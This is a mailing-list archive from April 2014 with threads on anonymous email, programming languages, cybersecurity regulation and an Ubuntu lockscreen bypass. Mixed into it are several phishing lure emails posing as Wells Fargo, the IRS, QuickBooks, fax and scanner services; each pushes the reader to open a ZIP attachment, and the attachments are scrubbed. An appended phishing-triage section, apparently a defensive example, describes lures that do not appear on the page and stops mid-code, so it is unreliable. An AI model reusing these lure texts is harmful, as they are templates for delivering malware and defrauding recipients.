> > to replace traditional email as we know it today.
>
> *Anonymous Email based on virtual institutions*
>
> What about this model? In a network you send your public email encryption key to a "virtual institution". The institution is defined by a name (e.g. AES string) and postal address (e.g. hash key). Having this information added to your node, all your email to you or from you will be stored in the virtual email provider institution. This detaches your node's IP and encryption key from the institution. That means care-of (c/o) institutions will be able to house 3rd-party e-mail without needing to distribute their own public keys.
>
> To create a post office for your friends, two methods exist:
>
> 1) Define a common neighbor (e.g. Alice and Bob connect to a common webserver as node, and all three have email encryption keys shared), then the webserver stores the emails, even if Alice or Bob are offline.
>
> 2) Or/additionally: create a virtual institution and add the email key of a friend to your node. In case your friend adds the magnet link (which contains name and address of the virtual institution, aka AES key and hash key) for the institution as well to his node, the institution will save all emails for him (as well as from senders which are not registered at the virtual institution).
>
> A magnet link allows sharing the virtual institution easily. The magnet URI would look like:
> *magnet:?in=Gmail&ct=aes256&pa=dotcom&ht=sha512&xt=urn:institution*
>
> With this method an email provider can be built without data retention and with the advantage of detaching email encryption keys from nodes' IP addresses. Next to TCP, you can use UDP and SCTP as protocol as well.
>
> Virtual Institutions (VI) have been, according to the homepage, introduced by the lib-version 0.9.04 of the http://goldbug.sf.net email and chat application.
>
> If we understand this right, now everyone can create an email provider without data retention just as a service for friends. In case in a network of connected nodes everyone uses "gmail" as VI-name and "dotcom" as VI-address, everyone will host everyone for email, while all remains encrypted. Could be a nice net or p2p model in a testing.
>

Although technical solutions are feasible, we ought to consider some things:

- Email is older than the web itself;
- Email has three times as many users as all social networks combined;
- Email is entrenched in the offices, many a business is powered by it;

Given the enormous energy necessary to remove such an appliance and replace it with something better.
How could we make a secure solution that plays nicely with the current tools without disturbing too much what is already established? From hannes at mehnert.org Tue Apr 22 13:04:23 2014 From: hannes at mehnert.org (Hannes Mehnert) Date: Tue, 22 Apr 2014 22:04:23 +0200 Subject: [liberationtech] [p2p-hackers] Programming language for anonymity network In-Reply-To: <5356BFD7.1050705@icsi.berkeley.edu> References: <5350E1BD.5010304@mpi-sws.org> <5356B97B.5000308@mehnert.org> <5356BFD7.1050705@icsi.berkeley.edu> Message-ID: <5356CB47.4050609@mehnert.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA384 On 04/22/2014 21:15, Christof Leng wrote: > I was very happy with Standard ML (non-object-oriented > 'predecessor' of OCAML) for writing complex P2P systems and even > user-land transport protocols. Agreed. I use the Caml part of OCaml. :) > Functional programming and static typing helps to discover subtle > bugs that go unnoticed in imperative languages (and I'm not talking > about something as ridiculous as buffer overruns). > > Unfortunately, Stevens requirement of familiarity still speaks > against functional programming languages, even for something as > popular (and watered-down) as Scala. It's very hard to find code > contributors who know the language or are willing to learn it. But if you have a chance to start from scratch, you should look at possible solutions and use a viable one. Especially the readability and maintainability of a programming language should be considered. Otherwise you end up with a piece of code which is not maintainable once the PhDs have graduated. You have to pay the technical debt at some point. And I'm not sure how to hand over a research project to 'the open source community'... Are there best practices/guidelines availble? I think the OCaml community is rather larger compared to other functional programming languages, and it is very helpful. 
Both the Real World OCaml book, available online at https://realworldocaml.org/, and their package management system OPAM, are awesome contributions over the last years to easily start with OCaml and to get more people involved.

Cheers,

Hannes

From dan at geer.org Wed Apr 23 05:08:56 2014
From: dan at geer.org (dan at geer.org)
Date: Wed, 23 Apr 2014 08:08:56 -0400
Subject: regulation on cybersecurity
Message-ID: <20140423120856.C69F62280CC@palinka.tinho.net>

The machinery is spinning up.

And the Cobbler's Children Have No Shoes ....
http://www.lawfareblog.com/2014/04/and-the-cobblers-children-have-no-shoes/

For those who prefer plaintext, lynx --dump yields the following

And the Cobbler's Children Have No Shoes ....

By [32]Paul Rosenzweig
Monday, April 21, 2014 at 7:00 AM

For quite some time, it has been apparent that the announcement of the [33]NIST Cybersecurity Framework would be a seminal event. Though couched as a voluntary program, many expected that [34]the Framework would become the de facto ground for liability.
After all, if the National Institute for Standards and Technology has determined a baseline framework for optimal security in the cyber domain, [35]what could be more negligent than failing to meet that minimum standard?

Unsurprisingly, the penny has begun to drop. Not, as one might have expected, in private sector tort suits, but in public sector regulatory action. Last week, the Securities and Exchange Commission [36]announced its intention to conduct an examination of the cybersecurity of 50 broker-dealers and investment advisers subject to its jurisdiction. The [37]questionnaire derives much of its content from the NIST Framework--so now the Framework will be the likely potential ground for regulatory action.

How ironic then, that in the same week, [38]the GAO issued a report critical of the SEC for its own [39]lack of adequate cybersecurity and oversight. Perhaps the cobbler's children don't have any shoes ....

  32. http://www.lawfareblog.com/author/paul/
  33. http://www.lawfareblog.com/2014/02/nist-cybersecurity-framework-issued/
  34. http://safegov.org/2013/11/1/the-nist-cybersecurity-framework-and-incentives
  35. http://www.newrepublic.com/article/115187/cybersecurity-liability-court-cases-are-changing-blame-game
  36. http://www.digitalcrazytown.com/2014/04/sec-issues-nist-inspired-cybersecurity.html
  37. http://www.sec.gov/ocie/announcement/Cybersecurity+Risk+Alert++%2526+Appendix+-+4.15.14.pdf
  38. http://www.gao.gov/products/GAO-14-419
  39. http://online.wsj.com/news/articles/SB10001424052702304626304579508100407450502

From gwen at cypherpunks.to Wed Apr 23 09:50:08 2014
From: gwen at cypherpunks.to (gwen hastings)
Date: Wed, 23 Apr 2014 09:50:08 -0700
Subject: regulation on cybersecurity
In-Reply-To: <37DA50E0-28BE-4381-82A8-4F2D6B4F33F1@gmail.com>
References: <20140423120856.C69F62280CC@palinka.tinho.net> <37DA50E0-28BE-4381-82A8-4F2D6B4F33F1@gmail.com>
Message-ID: <5357EF40.70803@cypherpunks.to>

looters and fucking tax thieves all

gwen

On 4/23/14 7:43 AM, Robert Hettinga wrote:
> On Apr 23, 2014, at 8:08 AM, dan at geer.org wrote:
>
>> The machinery is spinning up.
> “Just think, if we could just pass a few more laws, we could *all* be criminals.” — Vinnie Moscaritolo

--
Tentacle #99
ecc public key curve p25519(pcp 0.15)
1l0$WoM5C8z=yeZG7?$]f^Uu8.g>4rf#t^6mfW9(rr910

Governments are instituted among men, deriving their just powers from the consent of the governed, that whenever any form of government becomes destructive of these ends, it is the right of the people to alter or abolish it, and to institute new government, laying its foundation on such principles, and organizing its powers in such form, as to them shall seem most likely to effect their safety and happiness.’

https://github.com/TLINDEN/pcp.git to get pcp(curve25519 cli)
https://github.com/stef/pbp.git (curve 25519 python based cli)

-------------- next part --------------
A non-text attachment was scrubbed...
Name: 0x42AA24D5.asc
Type: application/pgp-keys
Size: 70878 bytes
Desc: not available
URL:

From drwho at virtadpt.net Wed Apr 23 10:00:09 2014
From: drwho at virtadpt.net (The Doctor)
Date: Wed, 23 Apr 2014 10:00:09 -0700
Subject: Fw: NSA good guys
In-Reply-To:
References: <53504f61.04693a0a.602f.5a7e@mx.google.com> <20140418020936.D82A62280DC@palinka.tinho.net> <1397865745.72147.YahooMailNeo@web126206.mail.ne1.yahoo.com> <1397929490.37026.YahooMailNeo@web126205.mail.ne1.yahoo.com> <20140419182746.GC2173@nl.grid.coop>
Message-ID: <5357F199.6010601@virtadpt.net>

On 04/22/2014 12:29 PM, grarpamp wrote:
> know what it does. Some speculate at least the US uses angled
> optical/radar shields to hide the bulk of some crafts from
> ground/orbital view. Sounds

There is speculation and some evidence along those lines in the book _Blank Spots on the Map_ by Trevor Paglen. No evidence (they weren't in orbit, after all) but the logic makes sense.

> Seems really difficult to fly and calibrate. ie: would certainly
> need better than gps timing onboard each. Maybe 1km pyramid of four
> could range each other well enough, no idea. As Jim referenced,
> membranes and

To the best of my knowledge (which is about six months out of date), satellite swarms that would act in a similar fashion to what is described above are still in their infancy. I do not believe any have been launched yet (if I did, I probably wouldn't be able to post to mailing lists like this...)

--
The Doctor [412/724/301/703] [ZS]
Developer, Project Byzantium: http://project-byzantium.org/
PGP: 0x807B17C1 / 7960 1CDC 85C9 0B63 8D9F DD89 3BD8 FF2B 807B 17C1
WWW: https://drwho.virtadpt.net/

"Phenomenal cosmic powers be damned - I have a lease."
--Harry Dresden

From hettinga at gmail.com Wed Apr 23 07:43:23 2014
From: hettinga at gmail.com (Robert Hettinga)
Date: Wed, 23 Apr 2014 10:43:23 -0400
Subject: regulation on cybersecurity
In-Reply-To: <20140423120856.C69F62280CC@palinka.tinho.net>
References: <20140423120856.C69F62280CC@palinka.tinho.net>
Message-ID: <37DA50E0-28BE-4381-82A8-4F2D6B4F33F1@gmail.com>

On Apr 23, 2014, at 8:08 AM, dan at geer.org wrote:

> The machinery is spinning up.

“Just think, if we could just pass a few more laws, we could *all* be criminals.” — Vinnie Moscaritolo

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 496 bytes
Desc: Message signed with OpenPGP using GPGMail
URL:

From dan at geer.org Wed Apr 23 10:31:04 2014
From: dan at geer.org (dan at geer.org)
Date: Wed, 23 Apr 2014 13:31:04 -0400
Subject: Fw: NSA good guys
In-Reply-To: Your message of "Wed, 23 Apr 2014 10:00:09 PDT." <5357F199.6010601@virtadpt.net>
Message-ID: <20140423173104.51D4E2280A4@palinka.tinho.net>

 | To the best of my knowledge (which is about six months out of date),
 | satellite swarms that would act in a similar fashion to what is
 | described above are still in their infancy. I do not believe any have
 | been launched yet (if I did, I probably wouldn't be able to post to
 | mailing lists like this...)

Get thee to the stream at http://www.cubesat.org/

--dan

From Kathrine.Pickens at wellsfargo.com Wed Apr 23 11:50:45 2014
From: Kathrine.Pickens at wellsfargo.com (Kathrine Pickens)
Date: Wed, 23 Apr 2014 13:50:45 -0500
Subject: FW: Account statements
Message-ID: <1DFVKF06.5502254@rms-network.com>

Please check out your latest account statements.
Kathrine Pickens
Level III Security Officer
817-520-1641 office
817-311-0626 cell
Kathrine.Pickens at wellsfargo.com

Investments in securities and insurance products are: NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103

CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: statement.pdf
Type: application/pdf
Size: 19456 bytes
Desc: not available
URL:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: statement.zip
Type: application/zip
Size: 10307 bytes
Desc: not available
URL:

From grarpamp at gmail.com Wed Apr 23 14:15:33 2014
From: grarpamp at gmail.com (grarpamp)
Date: Wed, 23 Apr 2014 17:15:33 -0400
Subject: Fw: NSA good guys
In-Reply-To: <20140423173104.51D4E2280A4@palinka.tinho.net>
References: <5357F199.6010601@virtadpt.net> <20140423173104.51D4E2280A4@palinka.tinho.net>
Message-ID:

On Wed, Apr 23, 2014 at 1:31 PM, wrote:
> http://www.cubesat.org/

Yes, and unlikely anyone will be packing enough atomic clock, optics, comms, compute, and attitude control in a 10cm3 cluster anytime soon. Though estimating what resolving power (or listening capability) one could get per 10cm3 in low orbit would be interesting.
https://en.wikipedia.org/wiki/Global_Positioning_System
https://en.wikipedia.org/wiki/Sounding_rocket
https://en.wikipedia.org/wiki/Unmanned_aerial_vehicle
http://www.dunveganspace.com/milestones
http://deepspaceindustries.com/

From incomefax at telesp.net.br Wed Apr 23 13:23:37 2014
From: incomefax at telesp.net.br (INCOMING FAX)
Date: Wed, 23 Apr 2014 17:23:37 -0300
Subject: You have received a new fax message
Message-ID: <38021.9040300@telesp.net.br>

Incoming fax from GHM80470563 at jfet.org
Scan date: Wed, 23 Apr 2014 17:23:37 -0300
Number of page(s): 3
Resolution: 400x400 DPI
_________________________________
Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: http://www.adobe.com/

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Scan141475705848.ZIP
Type: application/zip
Size: 6443 bytes
Desc: not available
URL:

From fax at jfet.org Wed Apr 23 10:11:30 2014
From: fax at jfet.org (INTERNAL FAX)
Date: Wed, 23 Apr 2014 18:11:30 +0100
Subject: New Fax: 2 pages
Message-ID:

Scanned from MFP04819191 by jfet.org
Date: Wed, 23 Apr 2014 18:11:30 +0100
Pages: 2
Resolution: 200x200 DPI
----------------------------------------

-------------- next part --------------
A non-text attachment was scrubbed...
Name: FAX972639.pdf
Type: application/pdf
Size: 18 bytes
Desc: not available
URL:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: FAX975009.zip
Type: application/zip
Size: 6466 bytes
Desc: not available
URL:

From grarpamp at gmail.com Wed Apr 23 15:28:20 2014
From: grarpamp at gmail.com (grarpamp)
Date: Wed, 23 Apr 2014 18:28:20 -0400
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <20140419134510.GA3833@sivokote.iziade.m$>
References: <20140419134510.GA3833@sivokote.iziade.m$>
Message-ID:

> Does a society of sheep deserve a government of wolves?

Evolution might say that both sheep and wolf share some common ancestor.
One diverged docile, or even without that gene theory, sheep are still eaten because they fail to fight back. Do not be dog food, cast off your warm fuzzy wools and become fighters in the ring.

From Virgie.Schaefer at wellsfargo.com Wed Apr 23 11:26:02 2014
From: Virgie.Schaefer at wellsfargo.com (Virgie Schaefer)
Date: Wed, 23 Apr 2014 19:26:02 +0100
Subject: FW: Account statements
Message-ID:

Please check out your latest account statements.

Virgie Schaefer
Level III Security Officer
817-547-8270 office
817-295-2895 cell
Virgie.Schaefer at wellsfargo.com

Investments in securities and insurance products are: NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE
Wells Fargo Advisors, LLC is a nonbank affiliate of Wells Fargo & Company, Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103

CONFIDENTIAL NOTICE: The contents of this message, including any attachments, are confidential and are intended solely for the use of the person or entity to whom the message was addressed. If you are not the intended recipient of this message, please be advised that any dissemination, distribution, or use of the contents of this message is strictly prohibited. If you received this message in error, please notify the sender. Please also permanently delete all copies of the original message and any attached documentation. Thank you.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: statement.pdf
Type: application/pdf
Size: 19456 bytes
Desc: not available
URL:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: statement.zip
Type: application/zip
Size: 10307 bytes
Desc: not available
URL:

From pgut001 at cs.auckland.ac.nz Wed Apr 23 09:19:30 2014
From: pgut001 at cs.auckland.ac.nz (Peter Gutmann)
Date: Thu, 24 Apr 2014 04:19:30 +1200
Subject: Fine grain Cross-VM Attacks on Xen and VMware (AES)
In-Reply-To: <4d480631ba7505e3c43b7bbe66c2e5e7@cryptolab.net>
Message-ID:

Griffin Boyce writes:

>'AES in a number of popular cryptographic libraries including OpenSSL, PolarSSL
>and Libgcrypt are vulnerable to Bernstein’s correlation attack when run in
>Xen and VMware virtual machines, the most popular VMs used by cloud service
>providers.'

That's just another proof of the inverse of Law #1 of the 10 Immutable Laws of Security, "If a bad guy can persuade you to run his program on your computer, it’s not your computer any more". The inverse is the Immutable Law of Cloud Computing Security, "If a bad guy can persuade you to run your program on his computer, it’s not your program any more".

Peter.

From stephan.neuhaus at tik.ee.ethz.ch Wed Apr 23 23:43:08 2014
From: stephan.neuhaus at tik.ee.ethz.ch (Stephan Neuhaus)
Date: Thu, 24 Apr 2014 08:43:08 +0200
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To:
References: <20140419134510.GA3833@sivokote.iziade.m$>
Message-ID: <5358B27C.8010903@tik.ee.ethz.ch>

On 2014-04-24, 00:28, grarpamp wrote:
>> Does a society of sheep deserve a government of wolves?
>
> Evolution might say that both sheep and wolf share some common
> ancestor. One diverged docile, or even without that gene theory,
> sheep are still eaten because they fail to fight back. Do not be dog
> food, cast off your warm fuzzy wools and become fighters in the
> ring.

Or, to put it more succinctly:

WAKE UP, SHEEPLE!

Fun,

Stephan

From cathalgarvey at cathalgarvey.me Thu Apr 24 01:04:32 2014
From: cathalgarvey at cathalgarvey.me (Cathal Garvey)
Date: Thu, 24 Apr 2014 09:04:32 +0100
Subject: Does a society of sheep deserve a government of wolves?
In-Reply-To: <5358B27C.8010903@tik.ee.ethz.ch>
References: <20140419134510.GA3833@sivokote.iziade.m$> <5358B27C.8010903@tik.ee.ethz.ch>
Message-ID: <5358C590.9050005@cathalgarvey.me>

> WAKE UP, SHEEPLE!

I'm glad someone finally called this thread what it is.

On 24/04/14 07:43, Stephan Neuhaus wrote:
> On 2014-04-24, 00:28, grarpamp wrote:
>>> Does a society of sheep deserve a government of wolves?
>>
>> Evolution might say that both sheep and wolf share some common
>> ancestor. One diverged docile, or even without that gene theory,
>> sheep are still eaten because they fail to fight back. Do not be dog
>> food, cast off your warm fuzzy wools and become fighters in the
>> ring.
>
> Or, to put it more succinctly:
>
> WAKE UP, SHEEPLE!
>
> Fun,
>
> Stephan
>

--
T: @onetruecathal, @IndieBBDNA
P: +353876363185
W: http://indiebiotech.com

-------------- next part --------------
A non-text attachment was scrubbed...
Name: 0x988B9099.asc
Type: application/pgp-keys
Size: 6176 bytes
Desc: not available
URL:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 901 bytes
Desc: OpenPGP digital signature
URL:

From incomefax at fm-dyn-139-228-231-19.fast.net.id.jfet.org Wed Apr 23 19:08:24 2014
From: incomefax at fm-dyn-139-228-231-19.fast.net.id.jfet.org (INCOMING FAX)
Date: Thu, 24 Apr 2014 09:08:24 +0700
Subject: You have received a new fax message
Message-ID: <36783.8070209@fm-dyn-139-228-231-19.fast.net.id>

Incoming fax from GHM03966250 at jfet.org
Scan date: Thu, 24 Apr 2014 09:08:24 +0700
Number of page(s): 5
Resolution: 400x400 DPI
_________________________________
Attached file is scanned image in PDF format.
Adobe(R)Reader(R) can be downloaded from the following URL: http://www.adobe.com/

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Scan132213385577.ZIP
Type: application/zip
Size: 6443 bytes
Desc: not available
URL:

From grarpamp at gmail.com Thu Apr 24 10:30:30 2014
From: grarpamp at gmail.com (grarpamp)
Date: Thu, 24 Apr 2014 13:30:30 -0400
Subject: AirChat radio, and cryptolaw
Message-ID:

https://github.com/lulzlabs/AirChat/
http://www.computerworld.com.au/article/543477/should_australians_prepare_rubber-hose_cryptanalysis_/

From grarpamp at gmail.com Fri Apr 25 08:18:34 2014
From: grarpamp at gmail.com (grarpamp)
Date: Fri, 25 Apr 2014 11:18:34 -0400
Subject: "Population Management"
Message-ID:

https://publicintelligence.net/identity-dominance/

From dan at geer.org Sun Apr 27 09:06:32 2014
From: dan at geer.org (dan at geer.org)
Date: Sun, 27 Apr 2014 12:06:32 -0400
Subject: Poul-Henning Kamp
Message-ID: <20140427160633.05E2A2280BC@palinka.tinho.net>

The talk Poul-Henning Kamp gave 12 Feb at FOSDEM

http://www.youtube.com/watch?v=fwcl17Q0bpk

parallels a half-dozen different threads found here. Carefully adjust your skepticism knob before listening (30m talk, 15m Q&A).

--dan

Scepticism is the chastity of the intellect; it is shameful to give it up too soon, or to the first comer.
-- George Santayana

From jya at pipeline.com Mon Apr 28 04:19:13 2014
From: jya at pipeline.com (John Young)
Date: Mon, 28 Apr 2014 07:19:13 -0400
Subject: [Cryptography] GCC bug 30475 (was Re: bounded pointers in C)
In-Reply-To: <99235eb92bed605e96b77d03fb29e812@xs4all.nl>
References: <1DA6B497-5D5F-4FF6-B0D4-1B1FFC1D9644@me.com> <535D6F5F.6050409@xs4all.nl> <201404280217.s3S2HQqW008448@new.toad.com> <99235eb92bed605e96b77d03fb29e812@xs4all.nl>
Message-ID:

The criminal liability of NSA, other spies corps, orgs and comsec wizards in de facto complicit deception and exploitation of the public is a worthy topic to drag out of the hideaways. It might be demonizing of the valiant code warriors to be described as a Racketeer Influenced Criminal Organization operating under the cheerfully duplicitous Open Source.
Open secrecy is the main tool of these sub rosa hoodlums, Mafioso mathematicians wiggling out of responsibility by algo shadiness and protestations of public service on behalf of working around censorship to free the slaves for better use producing cream for the privacy milkers.

Top of the cream milkers adopt the aggrieved innocence when caught red-handed rustling public cattle, hello Mr. Bundy. So sue me, they laugh, knowing no jury could possibly grasp the arcane lingo the bozos use to semaphore signals about their nefaria promoted as good for the commonweal. Subsidize us, befuddled citz, kachink.

A huge market ripoff, comsec, privacy and freedom of the Internet. Simple beginnings with a few crafty ne'er do well engineers, mathematicians and scientists, avoiding penal labor in labs, factories and spynests, setting up a quiet racket to control and monetize crypto, comsec and privacy while selling hacks and snitching to the fuzz downtown.

Which has produced a boom in profits and reputations for the TLA- and nick-named coders, hackers, exploiters, leakers, promoters, apologists, yes, even populist heroes and awards winners from Anonymous to Alexander to Snowden and this very list of who's who in wily coyotes. Code-wielding Corsicans never had it so good since the opening of the Internet frontier to unfettered gangsters claiming to be comsec enforcers for Judge Roy Bean west of Silicon Valley.

Just saying howdy to my gang of cypherpunks free rangers for whom working around law-enforcement fences while informing, backdooring, and cheating on each other is top secret code of silence Omerta.

From dal at riseup.net Mon Apr 28 14:02:17 2014
From: dal at riseup.net (Douglas Lucas)
Date: Mon, 28 Apr 2014 16:02:17 -0500
Subject: DoJ tried to stop Barrett Brown's criticism of gov
Message-ID: <535EC1D9.1080706@riseup.net>

This morning WhoWhatWhy published my new article, "Silencing Barrett Brown."
I obtained the transcript of the hacktivist journo's September 4 gag hearing, which revealed bench conference conversations that were inaudible from the gallery when I attended. The transcript shows the prosecution asked the judge to stop Brown's wide-ranging criticism of the government in general, claiming that his anti-authority "tone" in one of his Guardian articles was "problematic." My article also provides an update on his case and plea deal.

http://whowhatwhy.com/2014/04/28/silencing-barrett-brown/

From eric at konklone.com Tue Apr 29 10:35:54 2014
From: eric at konklone.com (Eric Mill)
Date: Tue, 29 Apr 2014 13:35:54 -0400
Subject: Ubuntu bug 1308572
In-Reply-To: <20140429133051.GA17929@sivokote.iziade.m$>
References: <20140429133051.GA17929@sivokote.iziade.m$>
Message-ID:

On Tue, Apr 29, 2014 at 9:30 AM, Georgi Guninski wrote:

> Ubuntu bug 1308572
>
> https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572
>
> -----
> affects ubuntu
>
> Hello,
> I am running Ubuntu 14.04 with all the packages updated.
> When the screen is locked with password, if I hold ENTER after some
> seconds the screen freezes and the lock screen crashes. After that I
> have the computer fully unlocked.

Fortunately, the final comment says:

"Just a sidenote: Unlike what the sensationalist article at heise.de from today suggests (which links here), this bug was fixed in a heroic effort over night *before* final release, the fix is on the 14.04 image that was released to end users."

>
> --
> Marco Agnese
>
> This bug is about the lockscreen being bypassed when unity crashes/restarts, which is a critical security issue.
> The crash will be handled from bug 1308750
> -----
>

--
konklone.com | @konklone

From guninski at guninski.com Tue Apr 29 06:30:51 2014
From: guninski at guninski.com (Georgi Guninski)
Date: Tue, 29 Apr 2014 16:30:51 +0300
Subject: Ubuntu bug 1308572
Message-ID: <20140429133051.GA17929@sivokote.iziade.m$>

Ubuntu bug 1308572

https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572

-----
affects ubuntu

Hello,
I am running Ubuntu 14.04 with all the packages updated.
When the screen is locked with password, if I hold ENTER after some seconds the screen freezes and the lock screen crashes. After that I have the computer fully unlocked.

--
Marco Agnese

This bug is about the lockscreen being bypassed when unity crashes/restarts, which is a critical security issue.
The crash will be handled from bug 1308750
-----

From TaxPro_PTIN at static-ip-77-89-126-88.promax.media.pl Wed Apr 30 05:16:02 2014
From: TaxPro_PTIN at static-ip-77-89-126-88.promax.media.pl (TaxPro_PTIN@irs.gov)
Date: Wed, 30 Apr 2014 13:16:02 +0100
Subject: Your FED TAX payment ( ID : KGPIRS594044264 ) was Rejected
Message-ID: <7.607070@static-ip-77-89-126-88.promax.media.pl>

*** PLEASE DO NOT RESPOND TO THIS EMAIL ***

Your federal Tax payment (ID: KGPIRS594044264), recently sent from your checking account was returned by your financial institution. For more information, please download attached notification. (Security PDF Adobe file)

Transaction Number: KGPIRS594044264
Payment Amount: $ 8520.00
Transaction status: Rejected
ACH Trace Number: 843581148679615
Transaction Type: ACH Debit Payment-DDA

Internal Revenue Service, Metro Plex 1, 8401 Corporate Drive, Suite 300, Landover, MD 20785.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: text/html
Size: 2376 bytes
Desc: not available
URL:
-------------- next part --------------
A non-text attachment was scrubbed...
Name: FED TAX Payment.zip
Type: application/zip
Size: 7086 bytes
Desc: not available
URL:

From auto-invoice at quickbooks.com Wed Apr 30 05:50:40 2014
From: auto-invoice at quickbooks.com (QuickBooks Invoice)
Date: Wed, 30 Apr 2014 13:50:40 +0100
Subject: Payment Overdue
Message-ID:

Please find attached your invoices for the past months.
Remit the payment by 03/23/2014 as outlined under our "Payment Terms" agreement.

Thank you for your business,

Sincerely,
Alicia Villanueva

This e-mail has been sent from an automated system. PLEASE DO NOT REPLY.

The information contained in this message may be privileged, confidential and protected from disclosure. If the reader of this message is not the intended recipient, or an employee or agent responsible for delivering this message to the intended recipient, you are hereby notified that any dissemination, distribution or copying of this communication is strictly prohibited. If you have received this communication in error, please notify your representative immediately and delete this message from your computer. Thank you.

-------------- next part --------------
A non-text attachment was scrubbed...
Name: invoice_04302014.zip
Type: application/zip
Size: 7052 bytes
Desc: not available
URL:

From HP_Printer at jfet.org Wed Apr 30 08:02:00 2014
From: HP_Printer at jfet.org (HP Digital Device)
Date: Wed, 30 Apr 2014 16:02:00 +0100
Subject: Scanned Image from a HP Digital Device
Message-ID:

Please open the attached document. This document was digitally sent to you using an HP Digital Sending device.

-------------------------------------------------------------------------------
This email has been scanned for viruses and spam.
-------------------------------------------------------------------------------

-------------- next part --------------
A non-text attachment was scrubbed...
Name: Image-195383.zip
Type: application/zip
Size: 7080 bytes
Desc: not available
URL:

From alerts at cable-24-135-134-39.dynamic.sbb.rs Wed Apr 30 12:37:43 2014
From: alerts at cable-24-135-134-39.dynamic.sbb.rs (Wells Fargo Advisors)
Date: Wed, 30 Apr 2014 20:37:43 +0100
Subject: Wells Fargo Advisors Online Documents Activated
Message-ID: <7.502020@cable-24-135-134-39.dynamic.sbb.rs>

Secure Email by Wells Fargo Advisors

Secure Email from Wells Fargo Advisors

To Read This Message:
Look for and open Message.zip (typically at the top or bottom; location varies by email service).

Need help? Support information, Video tutorial or call the support line at 1.877.879.2495, option 3.

Your email: cypherpunks at jfet.org

ATTENTION: THIS E-MAIL MAY BE AN ADVERTISEMENT OR SOLICITATION FOR PRODUCTS AND SERVICES. To unsubscribe from marketing e-mails from an individual Wells Fargo Advisors financial advisor, reply to one of his/her e-mails and type 'Unsubscribe' in the subject line. To unsubscribe from marketing emails from Wells Fargo and its affiliates, unsubscribe at www.wellsfargoadvisors.com/unsubscribe. Neither of these actions will affect delivery of important service messages regarding your accounts that we may need to send you or preferences you may have previously set for other e-mail services.
For additional information regarding our electronic communication policies, visit: http://wellsfargoadvisors.com/disclosures/email-disclosure.html Investments in securities and insurance products are: NOT FDIC-INSURED/NO BANK-GUARANTEES/MAY LOSE VALUE Investment professionals are registered representatives of Wells Fargo Advisors, LLC, a registered broker dealer and a separate non-bank affiliate of Wells Fargo & Company. Member FINRA/SIPC. 1 North Jefferson, St. Louis, MO 63103. Email Security Powered by Voltage IBE Copyright 2013 Wells Fargo. All rights reserved -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: text/html Size: 15190 bytes Desc: not available URL: -------------- next part -------------- A non-text attachment was scrubbed... Name: Message.zip Type: application/zip Size: 7092 bytes Desc: not available URL: From guninski at guninski.com Wed Apr 30 10:46:27 2014 From: guninski at guninski.com (Georgi Guninski) Date: Wed, 30 Apr 2014 20:46:27 +0300 Subject: Ubuntu bug 1308572 In-Reply-To: References: <20140429133051.GA17929@sivokote.iziade.m$> Message-ID: <20140430174627.GB2494@sivokote.iziade.m$> On Tue, Apr 29, 2014 at 01:35:54PM -0400, Eric Mill wrote: > On Tue, Apr 29, 2014 at 9:30 AM, Georgi Guninski wrote: > > Ubuntu bug 1308572 > > > > https://bugs.launchpad.net/ubuntu/+source/unity/+bug/1308572 > > > > ----- > > affects ubuntu > > > > Hello, > > I am running Ubuntu 14.04 with all the packages updated. > > When the screen is locked with password, if I hold ENTER after some > > seconds the screen freezes and the lock screen crashes. After that I > > have the computer fully unlocked. > > Fortunately, the final comment says: > > "Just a sidenote: Unlike what the sensationalist article at heise.de > from today suggests (which links here), this bug was fixed in a heroc > effort over night *before* final release, the fix is on the 14.04 > image that was released to end users." 
> > Dude, I don't trust ubuntu but don't like spamming about 10^8 critical bugs which I suspect will appear in the future. Watch their advisories page, having in mind ``multiple'' usually means ``quite a lot''. Also check the thread about gcc bugs.
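The lure messages archived on this page (the Intuit "payroll" invoice, the eFax and Xerox "scan" notices, the Wells Fargo "secure email") share one shape: a brand or office device in the display name, a ZIP attachment, and a body whose only job is to get the reader to open it. The script below is an added example, not part of the archive and not code anyone on the list posted. It rebuilds two of those messages plus a constructed benign control from the headers and body text shown above (pipermail's "user at host" obfuscation undone, scrubbed attachments replaced by placeholder bytes) and scores each on header and attachment indicators. The brand-to-domain table, the lure phrases, the residential-host regex and the score threshold are assumptions made for the example, not anyone's production rule set.

```python
"""Header/attachment triage over the phishing samples archived above.

Added example, not part of the mailing-list archive. The sample messages are
constructed from headers visible on the page; BRAND_DOMAINS, LURE_PHRASES,
DYNAMIC_HOST and the threshold are this example's assumptions.
"""
import re
from email.message import EmailMessage
from email.utils import parseaddr

# Assumption: domains a brand named in a display name would legitimately send from.
BRAND_DOMAINS = {
    "wells fargo": ("wellsfargo.com", "wellsfargoadvisors.com"),
    "efax": ("efax.com", "j2.com"),
    "intuit": ("intuit.com",),
}
# Assumption: phrases the archived lures use to push the reader at the attachment.
LURE_PHRASES = ("open the attached", "look for and open", "payment overdue",
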